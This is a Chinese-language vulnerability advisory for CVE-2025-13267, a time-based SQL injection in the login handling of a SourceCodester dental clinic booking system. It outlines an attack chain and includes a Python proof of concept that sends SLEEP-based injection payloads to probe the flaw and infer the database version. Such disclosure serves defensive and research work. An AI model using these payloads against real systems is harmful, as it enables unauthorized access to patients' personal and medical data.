CVE-2025-13267: SourceCodester牙科诊所预约系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13267

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Dental Clinic Appointment Reservation System 1.0

漏洞概述

CVE-2025-13267是SourceCodester公司开发的牙科诊所预约系统1.0版本中的一个中等严重性安全漏洞。该漏洞位于系统的/success.php文件中，攻击者可以通过操纵username和password参数进行SQL注入攻击。由于该漏洞可被远程利用，且不需要高权限认证，因此对系统安全构成较大威胁。成功利用此漏洞的攻击者可以绕过身份验证机制，访问敏感数据，甚至可能在某些情况下对数据库进行增删改查操作。该漏洞的CVSS评分为6.3，属于中等严重级别，CVSS向量为CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L，表明攻击复杂度低，无需用户交互即可发起攻击。该漏洞已于2025年11月17日公开披露， exploits已公开，可能已被恶意利用。

技术细节

该SQL注入漏洞存在于Dental Clinic Appointment Reservation System 1.0的/success.php文件中，具体位置在用户认证流程的username和password参数处理部分。攻击者可以通过在username或password字段中注入恶意SQL语句来利用此漏洞。由于应用程序未对用户输入进行充分的参数化查询或输入验证，恶意SQL代码会被数据库服务器执行。根据公开的漏洞利用文档，该漏洞属于基于时间的SQL注入（Time-Based SQL Injection），攻击者可以通过注入如SLEEP()或BENCHMARK()等时间延迟函数来推断数据库信息。攻击者可以利用UNION SELECT语句结合条件判断来逐步提取数据库中的敏感信息，包括用户凭证、预约数据、个人健康信息等。由于该系统用于管理牙科诊所的预约信息，泄露的数据可能包含患者的个人身份信息和医疗记录，具有较高的隐私风险。攻击者还可以利用SQL注入获取数据库管理权限，进而控制整个数据库服务器。

攻击链分析

STEP 1

1

侦察阶段：攻击者识别目标系统为SourceCodester Dental Clinic Appointment Reservation System 1.0，并定位到存在漏洞的/success.php认证页面

STEP 2

2

探测阶段：攻击者构造SQL注入测试载荷（如包含SLEEP函数的payload）并发送到username或password参数，验证漏洞存在性

STEP 3

3

数据提取阶段：利用基于时间的盲注技术，通过条件判断和时间延迟逐步提取数据库中的敏感信息，包括用户表结构和数据

STEP 4

4

权限提升阶段：获取管理员账户凭证后，攻击者可以绕过认证机制访问系统后台，获取更多敏感医疗数据

STEP 5

5

持久化阶段：攻击者可能在数据库中植入后门或修改数据，为后续攻击建立持久化访问通道

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13267 SQL Injection PoC
# Target: SourceCodester Dental Clinic Appointment Reservation System 1.0
# File: /success.php
# Parameter: username / password

import requests
import time
import sys

target_url = "http://target.com/success.php"

def test_sql_injection_time_based():
    """Test for time-based SQL injection vulnerability"""
    
    # Basic payload to test for SQL injection
    # This payload causes a 5-second delay if vulnerable
    payload = "' OR SLEEP(5)-- -"
    
    data = {
        'username': payload,
        'password': 'test'
    }
    
    print(f"[*] Testing SQL injection on {target_url}")
    print(f"[*] Payload: {payload}")
    
    start_time = time.time()
    response = requests.post(target_url, data=data, timeout=30)
    elapsed_time = time.time() - start_time
    
    print(f"[*] Response time: {elapsed_time:.2f} seconds")
    
    if elapsed_time >= 5:
        print("[+] Time-based SQL injection confirmed!")
        return True
    else:
        print("[-] No SQL injection detected")
        return False

def extract_db_version():
    """Extract database version using time-based blind SQL injection"""
    
    # Payload to extract database version
    # Uses conditional time delay based on version extraction
    payload = "' OR IF(SUBSTRING(@@version,1,1)='5',SLEEP(3),0)-- -"
    
    data = {
        'username': payload,
        'password': 'test'
    }
    
    start_time = time.time()
    response = requests.post(target_url, data=data, timeout=30)
    elapsed_time = time.time() - start_time
    
    if elapsed_time >= 3:
        print("[+] Database version starts with '5' (MySQL 5.x)")
        return True
    return False

if __name__ == "__main__":
    test_sql_injection_time_based()

影响范围

SourceCodester Dental Clinic Appointment Reservation System 1.0

防御指南

临时缓解措施

立即限制对/success.php文件的访问，或在Web服务器层面配置临时访问控制规则。同时建议使用输入验证中间件对所有用户输入进行过滤处理。虽然这是源代码级别的漏洞，建议暂时禁用受影响的认证功能，等待官方安全补丁发布。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13267
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13267
3 Details https://www.cvedetails.com/cve/CVE-2025-13267/
4 VulDB https://vuldb.com/cve/CVE-2025-13267
5 Link https://github.com/0xffaaa/cve/blob/main/Dental_Clinic_Appointment_Reservation_System_Time-Based_SQL_Injection2.md
6 Link https://vuldb.com/?ctiid.332602
7 Link https://vuldb.com/?id.332602
8 Link https://vuldb.com/?submit.689450
9 Link https://www.sourcecodester.com/